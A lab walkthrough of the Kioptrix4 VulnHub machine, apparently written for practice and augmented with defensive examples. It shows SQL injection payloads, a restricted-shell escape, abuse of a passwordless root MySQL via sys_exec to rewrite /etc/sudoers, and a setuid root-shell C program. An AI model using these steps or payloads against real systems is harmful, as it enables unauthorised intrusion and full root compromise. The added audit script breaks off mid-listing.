Lab Practice - Kioptrix4

Lab setup

Download: https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

The download is only a virtual disk and cannot be opened on its own: create a new virtual machine and attach the disk to it. See this article: https://blog.csdn.net/qq_32261191/article/details/106408751

IP address in NAT mode: 192.168.74.136

Information gathering

nmap

┌──(root㉿kali)-[~]
└─# nmap -A 192.168.74.136     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 07:26 EDT
Nmap scan report for 192.168.74.136
Host is up (0.00041s latency).
Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:D3:23:98 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2024-04-07T15:27:02-04:00
|_clock-skew: mean: 10h00m02s, deviation: 2h49m43s, median: 8h00m01s

TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 192.168.74.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.79 seconds

Ports 22, 80, 139 and 445 are open.

┌──(root㉿kali)-[~]
└─# nmap --script=vuln 192.168.74.136                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 07:33 EDT
Stats: 0:02:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.21% done; ETC: 07:36 (0:00:01 remaining)
Nmap scan report for 192.168.74.136
Host is up (0.00037s latency).
Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.74.136
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.74.136:80/
|     Form id: myusername
|     Form action: checklogin.php
|     
|     Path: http://192.168.74.136:80/checklogin.php
|     Form id: 
|     Form action: index.php
|     
|     Path: http://192.168.74.136:80/index.php
|     Form id: myusername
|_    Form action: checklogin.php
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum: 
|   /database.sql: Possible database backup
|   /icons/: Potentially interesting folder w/ directory listing
|   /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_  /index/: Potentially interesting folder
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:D3:23:98 (VMware)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 324.75 seconds

The vulnerability scripts report possible CSRF, a database backup file, and a Slowloris slow-DoS condition that is not important here.

dirsearch

┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.74.136
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                      
                                                                                                                                                                                                             
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/_192.168.74.136/_24-04-07_07-32-38.txt

Target: http://192.168.74.136/

[07:32:38] Starting:                                                                                                                                                                                         
[07:32:41] 403 -  332B  - /.ht_wsr.txt                                      
[07:32:41] 403 -  335B  - /.htaccess.bak1                                   
[07:32:41] 403 -  335B  - /.htaccess.orig
[07:32:41] 403 -  335B  - /.htaccess.save                                   
[07:32:41] 403 -  336B  - /.htaccess_extra
[07:32:41] 403 -  333B  - /.htaccess_sc
[07:32:41] 403 -  333B  - /.htaccessBAK
[07:32:41] 403 -  334B  - /.htaccessOLD2                                    
[07:32:41] 403 -  335B  - /.htaccess_orig                                   
[07:32:41] 403 -  337B  - /.htaccess.sample
[07:32:41] 403 -  326B  - /.html                                            
[07:32:41] 403 -  325B  - /.htm
[07:32:41] 403 -  335B  - /.htpasswd_test                                   
[07:32:41] 403 -  333B  - /.htaccessOLD
[07:32:41] 403 -  331B  - /.htpasswds                                       
[07:32:41] 403 -  332B  - /.httr-oauth
[07:33:04] 403 -  329B  - /cgi-bin/                                         
[07:33:05] 200 -  109B  - /checklogin                                       
[07:33:05] 200 -  109B  - /checklogin.php                                   
[07:33:09] 200 -  298B  - /database.sql                                     
[07:33:11] 403 -  325B  - /doc/                                             
[07:33:11] 403 -  340B  - /doc/en/changes.html
[07:33:11] 403 -  329B  - /doc/api/
[07:33:11] 403 -  340B  - /doc/html/index.html                              
[07:33:11] 403 -  339B  - /doc/stable.version
[07:33:20] 301 -  356B  - /images  ->  http://192.168.74.136/images/        
[07:33:20] 200 -  933B  - /images/                                          
[07:33:27] 302 -    0B  - /logout.php  ->  index.php                        
[07:33:27] 302 -    0B  - /logout  ->  index.php                            
[07:33:27] 302 -    0B  - /logout/  ->  index.php                           
[07:33:29] 302 -  220B  - /member.php  ->  index.php                        
[07:33:29] 302 -  220B  - /member  ->  index.php                            
[07:33:29] 302 -  220B  - /member/admin.asp  ->  index.php
[07:33:29] 302 -  220B  - /member/login.aspx  ->  index.php
[07:33:29] 302 -  220B  - /member/login.jsp  ->  index.php
[07:33:29] 302 -  220B  - /member/login.asp  ->  index.php
[07:33:29] 302 -  220B  - /member/login.html  ->  index.php
[07:33:29] 302 -  220B  - /member/login.js  ->  index.php
[07:33:29] 302 -  220B  - /member/logon  ->  index.php
[07:33:29] 302 -  220B  - /member/signin  ->  index.php
[07:33:29] 302 -  220B  - /member/login  ->  index.php                      
[07:33:29] 302 -  220B  - /member/login.php  ->  index.php
[07:33:29] 302 -  220B  - /member/  ->  index.php
[07:33:29] 302 -  220B  - /member/login.rb  ->  index.php
[07:33:29] 302 -  220B  - /member/login.py  ->  index.php                   
[07:33:49] 403 -  334B  - /server-status                                    
[07:33:49] 403 -  335B  - /server-status/ 

The database backup file shows up here as well; that is the important find.

Web information

┌──(root㉿kali)-[~]
└─# whatweb http://192.168.74.136/
http://192.168.74.136/ [200 OK] Apache[2.2.8], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch], IP[192.168.74.136], PHP[5.2.4-2ubuntu5.6][Suhosin-Patch], PasswordField[mypassword], X-Powered-By[PHP/5.2.4-2ubuntu5.6]

Summary

  • Database backup file
  • CSRF
  • SSH brute force
  • Samba service attacks
  • Apache 2.2.8
  • PHP 5.2.4
  • Linux 2.6.9 - 2.6.33

Exploitation

With this kind of setup, the web layer is the place to start.

Database leak

Download the database file first and take a look.

CREATE TABLE `members` (
`id` int(4) NOT NULL auto_increment,
`username` varchar(65) NOT NULL default '',
`password` varchar(65) NOT NULL default '',
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=2 ;

-- 
-- Dumping data for table `members`
-- 

INSERT INTO `members` VALUES (1, 'john', '1234');

There is a credential pair: john/1234.

That means we may be able to log in to the web page and dig further, so let's try logging in.

Wrong username or password. Are you messing with me? Straight to injection!

SQL injection

sqlmap, go!

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.74.136/checklogin.php --data="myusername=john&mypassword=123456&Submit=Login"
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:56:24 /2024-04-07/

[07:56:24] [INFO] testing connection to the target URL
[07:56:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[07:56:24] [INFO] testing if the target URL content is stable
[07:56:25] [INFO] target URL content is stable
[07:56:25] [INFO] testing if POST parameter 'myusername' is dynamic
[07:56:25] [WARNING] POST parameter 'myusername' does not appear to be dynamic
[07:56:25] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable
[07:56:25] [INFO] testing for SQL injection on POST parameter 'myusername'
[07:56:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:56:27] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:56:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:56:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:56:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[07:56:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[07:56:29] [INFO] testing 'Generic inline queries'
[07:56:29] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[07:56:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[07:56:29] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[07:56:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:56:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[07:56:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[07:56:29] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] 

[07:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[07:56:43] [WARNING] POST parameter 'myusername' does not seem to be injectable
[07:56:43] [INFO] testing if POST parameter 'mypassword' is dynamic
[07:56:43] [WARNING] POST parameter 'mypassword' does not appear to be dynamic
[07:56:43] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL')
[07:56:43] [INFO] testing for SQL injection on POST parameter 'mypassword'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 

[07:56:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:56:45] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:56:45] [INFO] testing 'Generic inline queries'
[07:56:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[07:56:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
got a 302 redirect to 'http://192.168.74.136/login_success.php?username=john'. Do you want to follow? [Y/n] 

redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] 

[07:56:48] [INFO] POST parameter 'mypassword' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --code=302)
[07:56:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[07:56:48] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[07:56:48] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[07:56:48] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[07:56:48] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[07:56:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[07:56:48] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[07:56:48] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[07:56:48] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[07:56:48] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[07:56:48] [INFO] testing 'MySQL inline queries'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[07:56:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[07:56:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:56:58] [INFO] POST parameter 'mypassword' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[07:56:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:56:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[07:56:58] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:56:58] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[07:56:58] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[07:56:59] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[07:56:59] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive


sqlmap identified the following injection point(s) with a total of 346 HTTP(s) requests:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=john&mypassword=-7436' OR 9853=9853#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=john&mypassword=123456' AND (SELECT 9393 FROM (SELECT(SLEEP(5)))iVay)-- jOgj&Submit=Login
---
[07:58:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP, PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[07:58:01] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.74.136'

[*] ending @ 07:58:01 /2024-04-07/

Boolean-based and time-based blind injection were found, so read the database contents directly: sqlmap -u http://192.168.74.136/checklogin.php --data="myusername=john&mypassword=123456&Submit=Login" --dbs

[*] information_schema
[*] members
[*] mysql

Dump the database directly.

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.74.136/checklogin.php --data="myusername=john&mypassword=123456&Submit=Login" --dump             
        ___
       __H__                                                                                                                                                                                                
 ___ ___[']_____ ___ ___  {1.8#stable}                                                                                                                                                                      
|_ -| . ["]     | .'| . |                                                                                                                                                                                   
|___|_  [,]_|_|_|__,|  _|                                                                                                                                                                                   
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:03:52 /2024-04-07/

[08:03:52] [INFO] resuming back-end DBMS 'mysql' 
[08:03:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=john&mypassword=-7436' OR 9853=9853#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=john&mypassword=123456' AND (SELECT 9393 FROM (SELECT(SLEEP(5)))iVay)-- jOgj&Submit=Login
---
[08:03:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[08:03:52] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[08:03:52] [INFO] fetching current database
[08:03:52] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:03:52] [INFO] retrieved: 
got a 302 redirect to 'http://192.168.74.136/login_success.php?username=john'. Do you want to follow? [Y/n] 

redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] 

members
[08:04:01] [INFO] fetching tables for database: 'members'
[08:04:01] [INFO] fetching number of tables for database 'members'
[08:04:01] [INFO] resumed: 1
[08:04:01] [INFO] resumed: members
[08:04:01] [INFO] fetching columns for table 'members' in database 'members'
[08:04:01] [INFO] retrieved: 3
[08:04:01] [INFO] retrieved: id
[08:04:01] [INFO] retrieved: username
[08:04:02] [INFO] retrieved: password
[08:04:02] [INFO] fetching entries for table 'members' in database 'members'
[08:04:02] [INFO] fetching number of entries for table 'members' in database 'members'
[08:04:02] [INFO] retrieved: 2
[08:04:02] [INFO] retrieved: 1
[08:04:02] [INFO] retrieved: MyNameIsJohn
[08:04:03] [INFO] retrieved: john
[08:04:04] [INFO] retrieved: 2
[08:04:04] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[08:04:05] [INFO] retrieved: robert
Database: members
Table: members
[2 entries]
+----+-----------------------+----------+
| id | password              | username |
+----+-----------------------+----------+
| 1  | MyNameIsJohn          | john     |
| 2  | ADGAdsafdfwt4gadfga== | robert   |
+----+-----------------------+----------+

[08:04:06] [INFO] table 'members.members' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.74.136/dump/members/members.csv'
[08:04:06] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.74.136'

[*] ending @ 08:04:06 /2024-04-07/
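
The injection sqlmap found above works because the login builds its SQL by concatenating the POST fields. The following Python is an added example, not code from the original post or from the Kioptrix VM (whose checklogin.php source is not shown here): it models such a login against an in-memory SQLite copy of the dumped members table, runs sqlmap's boolean payload against the string-built query and against a parameterized one, and shows that only the parameterized query rejects it. Two assumptions are labelled in the code: the shape of the query, and the use of the `-- ` comment (which sqlmap's time-based payload also used) in place of MySQL's `#`, since SQLite does not treat `#` as a comment.

```python
"""Added example (not from the original post): why a string-built login query is
injectable and how a parameterized query closes the hole.

Assumptions: the login is modelled as `WHERE username='...' AND password='...'`
built by concatenation (the classic pattern; Kioptrix4's real checklogin.php is
not shown in the post). SQLite stands in for MySQL so this runs offline.
"""
import sqlite3

# Rows as dumped by sqlmap in the post.
MEMBERS = [(1, "john", "MyNameIsJohn"), (2, "robert", "ADGAdsafdfwt4gadfga==")]

# sqlmap's boolean-based payload, with MySQL's '#' comment rewritten as '-- '
# (SQLite has no '#' comment; the '-- ' form also appears in sqlmap's second payload).
BOOLEAN_PAYLOAD = "-7436' OR 9853=9853-- "


def make_db():
    """In-memory SQLite database holding the dumped members table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", MEMBERS)
    return conn


def login_vulnerable(conn, myusername, mypassword):
    """String-built query: the POST fields become part of the SQL grammar."""
    sql = ("SELECT username FROM members WHERE username='%s' AND password='%s'"
           % (myusername, mypassword))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, myusername, mypassword):
    """Parameterized query: the POST fields are bound as data, never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM members WHERE username=? AND password=?",
        (myusername, mypassword),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Compare both logins on correct, wrong and injected credentials."""
    conn = make_db()
    return {
        "correct creds, vulnerable": login_vulnerable(conn, "john", "MyNameIsJohn"),
        "wrong creds, vulnerable": login_vulnerable(conn, "john", "123456"),
        "payload, vulnerable": login_vulnerable(conn, "john", BOOLEAN_PAYLOAD),
        "payload, safe": login_safe(conn, "john", BOOLEAN_PAYLOAD),
        "correct creds, safe": login_safe(conn, "john", "MyNameIsJohn"),
    }


if __name__ == "__main__":
    for case, user in demo().items():
        print("%-28s -> %s" % (case, user))
```

In the vulnerable variant the WHERE clause becomes `(username='john' AND password='-7436') OR 9853=9853`, which is true for every row, so the first member is returned and the login succeeds without a password; the parameterized variant compares the whole payload string against the password column and returns nothing.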

Got the credentials. Logging in to the site works, but there is nothing there.

So let's see whether SSH accepts them.

ssh

┌──(root㉿kali)-[~]
└─# ssh -oHostKeyAlgorithms=+ssh-dss john@192.168.74.136
The authenticity of host '192.168.74.136 (192.168.74.136)' can't be established.
DSA key fingerprint is SHA256:l2Z9xv+mXqcandVHZntyNeV1loP8XoFca+R/2VbroAw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.74.136' (DSA) to the list of known hosts.
john@192.168.74.136's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ 

We're in, but be sure to add the -oHostKeyAlgorithms=+ssh-dss option! The default ssh client no longer enables the ssh-dss host key algorithm, so the connection only succeeds with that option added.

But even ls won't run; it turns out to be a restricted shell.

Restricted shell and how to escape it: https://www.aldeid.com/wiki/Lshell

We need to break out into a normal interactive shell.

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ whoami
john

Now we have a normal shell, but still with low privileges.

Next step: find a way to escalate privileges.

The website talks to a database; if the database runs as root, it may offer a privilege escalation path. Let's check.

john@Kioptrix4:~$ ps -aux | grep mysql
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
root      4419  0.0  0.1   1772   528 ?        S    15:20   0:00 /bin/sh /usr/bin/mysqld_safe
root      4461  0.0  3.3 127224 17304 ?        Sl   15:20   0:01 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3
root      4463  0.0  0.1   1700   556 ?        S    15:20   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
john      4911  0.0  0.1   3004   756 pts/0    R+   16:43   0:00 grep mysql

Excellent, the database runs as root, so let's try to escalate through it.

Privilege escalation

Try logging in to the database: an empty password, the passwords already obtained, a password from the website's config files, or simply brute force.

Since this is local, try an empty password first.

john@Kioptrix4:~$ mysql -u root -h localhost
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 4918
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> 

Straight in.

Change the ownership of the sudoers file via MySQL's sys_exec

mysql> SELECT sys_exec('chown john:john /etc/sudoers');
+------------------------------------------+
| sys_exec('chown john:john /etc/sudoers') |
+------------------------------------------+
| NULL                                     | 
+------------------------------------------+
1 row in set (0.00 sec)

Add the john account to sudoers

john@Kioptrix4:~$ chmod 777 /etc/sudoers
john@Kioptrix4:~$ vim /etc/sudoers 
# /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# See the man page for details on how to write a sudoers file.
#

Defaults        env_reset

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root    ALL=(ALL) ALL
john    ALL=NOPASSWD :ALL

# Uncomment to allow members of group sudo to not need a password
# (Note that later entries override this, so you might need to move
# it further down)
# %sudo ALL=NOPASSWD: ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

Now sudo can switch to root without a password.

After saving, change the mode and ownership back.

john@Kioptrix4:~$ chmod 0440 /etc/sudoers
mysql> select sys_exec('chown root:root /etc/sudoers');
+------------------------------------------+
| sys_exec('chown root:root /etc/sudoers') |
+------------------------------------------+
| NULL                                     | 
+------------------------------------------+
1 row in set (0.00 sec)

mysql> exit
Bye
john@Kioptrix4:~$ sudo su
root@Kioptrix4:/home/john# whoami
root

Root obtained!

Another person used a C program for the escalation: upload the compiled binary, use MySQL's root privileges on it, and run it to get a root bash.

Here is the C source code

#define _GNU_SOURCE     /* setresuid/setresgid are GNU extensions */
#include <stdlib.h>     /* system() */
#include <unistd.h>

int main(void)
{
    /* Set the real, effective and saved user IDs to 0, i.e. root */
    setresuid(0, 0, 0);

    /* Set the real, effective and saved group IDs to 0, i.e. root's group */
    setresgid(0, 0, 0);

    /* Run /bin/bash via system(), starting an interactive shell */
    system("/bin/bash");

    return 0;
}

Give the compiled file the setuid bit and mode 777 through MySQL, then run the exploit as john to get root.

mysql> SELECT sys_exec('chmod +s,a+rwx /tmp/exploit');
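
Everything from the MySQL login onward relied on conditions a host audit can catch: the database server running as root, a sudoers file that was handed to a normal user and given a NOPASSWD entry, and a setuid binary that anyone can overwrite. The Python below is an added example, not code from the original post, that checks all three. The ps listing and sudoers text are constructed from the post's output (shortened), and the ownership/mode checks take plain numbers so the script runs offline; on a live host feed them a `ps aux` listing, the sudoers contents and `os.stat()` results.

```python
"""Added example, not part of the original post: an audit for the misconfigurations
the privilege escalation above relied on.
"""
import re

# Constructed from the post's `ps -aux | grep mysql` output (command line shortened).
PS_SAMPLE = """\
root      4419  0.0  0.1   1772   528 ?        S    15:20   0:00 /bin/sh /usr/bin/mysqld_safe
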